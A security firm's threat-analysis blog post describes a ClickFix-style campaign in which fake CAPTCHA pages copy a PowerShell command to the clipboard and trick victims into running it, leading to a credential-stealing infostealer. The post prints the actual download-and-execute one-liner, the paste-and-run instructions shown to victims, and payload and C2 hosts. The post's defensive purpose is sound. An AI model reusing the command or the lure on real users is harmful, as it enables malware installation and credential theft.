Conscia SOC team uncovered a new attack exploiting CAPTCHA prompts. The “CAPTCHAclipper” attack blends social engineering and technical sophistication to deploy malware. Read our analysis to understand the attack chain, IOCs, and actionable defenses.
The Conscia Security Operations Center (SOC) team recently uncovered a meticulously crafted attack chain executed by a threat actor leveraging a seemingly innocuous CAPTCHA prompt.
This attack, which we’ve dubbed CAPTCHAclipper, exemplifies the convergence of social engineering and technical sophistication to compromise victims’ systems and exfiltrate sensitive data.
We observed the same TTPs in three distinct attacks over the course of one month, all within the European geographical region.
Due to the nature of the attack chain, we suspect a sophisticated threat actor is behind these attacks. However, we cannot provide any attribution at the time of writing. The main payload is probably a variant of LummaC2 malware.
When we first investigated the incident, the provided IOCs were not flagged as malicious, indicating the usage of novel TTPs. However, as of publishing this article, we can already see certain AV Engines recognizing at least some of the IOCs, but they can easily be altered and repurposed.
Below, we discuss different stages of the attack chain.
Analysis of Attack Chain
Stage 1: The Malicious CAPTCHA Lure
The attack began with a targeted lure: users were directed to a malicious, but legitimate-looking, website hosting a PDF file that the user was presented to download in a phishing lure. Before being able to download the file, the victim is presented with interactive CAPTCHA.
This initial step served a dual purpose:
- It established a layer of trust by mimicking legitimate verification methods.
- It initiated the first technical exploit via JavaScript, which we also recognize as ‘ClickFix’ or ‘paste and run’ technique.
When users engaged with the CAPTCHA to access a promised PDF file, a malicious JavaScript payload silently executed in the background.
This script copied a PowerShell command to the system clipboard, preparing the ground for the next stage:
powershell -WindowStyle Hidden -Command “$rQd=‘https://s3-scw-tx.b-cdn[.]net/prizev2[.]txt’; $pLs=New-Object System.Net.WebClient; $sLf=$pLs.DownloadString($rQd); Invoke-Expression $sLf;”
Stage 2: Social Engineering with Malicious Instructions
After completing the CAPTCHA, victims received a notification for verification steps before being able to download the file. In order to download it, the victim had to follow the provided instructions, which were critical to the attack’s success.
- Press Win+R to open the Run dialog.
- Press CTRL+V to paste the clipboard command (not knowingly).
- Press Enter.
This seemingly benign command was, in reality, a carefully engineered delivery mechanism. It:
- Downloaded a malicious script:
prizev2.txt
from a remote server. - Executed the script entirely in memory, bypassing file-based detections.
Stage 3: Deployment of Malicious Payload
The downloaded script carried out multiple tasks to prepare for further exploitation:
- Retrieved a ZIP file (prize.zip) from
https://fixedzip.oss-ap-southeast-5.aliyuncs.com.
- Extracted the ZIP file contents into a randomly generated folder within the APPDATA directory.
- Launched the executable
setup.exe
, initiating the attack’s next phase.
The use of the APPDATA
directory ensured minimal visibility to routine security scans, emphasizing the actor’s focus on evasion.
Stage 4: Malicious Activities of Setup.exe
The executable Setup.exe
was a potent tool designed for both immediate impact and long-term persistence. Its TTPs included:
- Credential Theft: Extracting login credentials stored in browser files (Login Data) for different browser at their typical file location.
- Reconnaissance: Identifying installed antivirus and endpoint protection software to evade detection or disable defenses.
- Command-and-Control (C2) Communication: Establishing an outbound connection to
21.4.107:443
, linked to the domainsliperyedhby.icu
. This connection facilitated data exfiltration and allowed further commands from the attacker. - Persistence Mechanisms: Registering itself in the
Windows Task Scheduler
for automatic execution after system reboots. Creating an additional file (69HT8K.pif), potentially as a decoy or a secondary stage.
Indicators of Compromise (IOCs)
File Artifacts |
|
File Name | SHA-256 |
Setup.exe |
|
Autolt3.exe |
|
Networking Artifacts |
|
Domains: |
|
IP Address: |
|
Implications and Lessons Learned
The CAPTCHAclipper attack highlights a sophisticated, multi-layered approach to compromising systems:
- User Interaction as an Attack Vector: The reliance on user-driven actions (copy-pasting commands) exemplifies the effectiveness of social engineering.
- Memory-Based Execution: Executing payloads in memory minimized detection by traditional antivirus solutions.
- Persistence and Exfiltration: Establishing persistence ensured long-term access, while C2 communication enabled data theft and remote control.
Effective defense strategies
The CaptchaClipper attack is a reminder of the evolving tactics employed by cyber adversaries. Its blend of technical ingenuity and psychological manipulation demonstrates the importance of proactive defense strategies. By leveraging social engineering and multi-stage infection techniques, attackers effectively bypass traditional defenses and exploit user trust.
To defend against such sophisticated threats, Conscia SOC recommends that organizations adopt a multi-faceted cybersecurity approach:
- User Awareness Training: Conduct regular training sessions to help employees recognize phishing and other social engineering techniques.
- Enable Endpoint Detection and Response (EDR): Deploy solutions that can identify and mitigate fileless malware and suspicious PowerShell activity.
- Employ continuous monitoring of security events: Deploying security solutions is not enough, if you do not have analysts looking over the potential incidents. The timeliness of detection is crucial in these types of attacks as most of the attack chain is automated.
- Restrict PowerShell Usage: Limit PowerShell execution to signed scripts only, and monitor PowerShell activity closely.
- Network Monitoring and Data Leak Detection: Implement network monitoring tools to detect unusual outbound connections to C2 servers or unauthorized data exfiltration.
- Incident Response Planning: Ensure your team is prepared to respond to multi-stage infections with a clear remediation strategy.
In addition to that, we also encourage all cybersecurity professionals to actively participate in the cybersecurity community. You can:
- Collaborate and Share Intelligence: Share insights and indicators of compromise (IOCs) with trusted communities to help combat similar threats.
- Report and Investigate: If you detect similar activity, report it to your threat intelligence providers or national cybersecurity bodies to track emerging trends.
- Enhance Threat Hunting: Leverage this analysis as a use case to improve threat-hunting capabilities within your organization.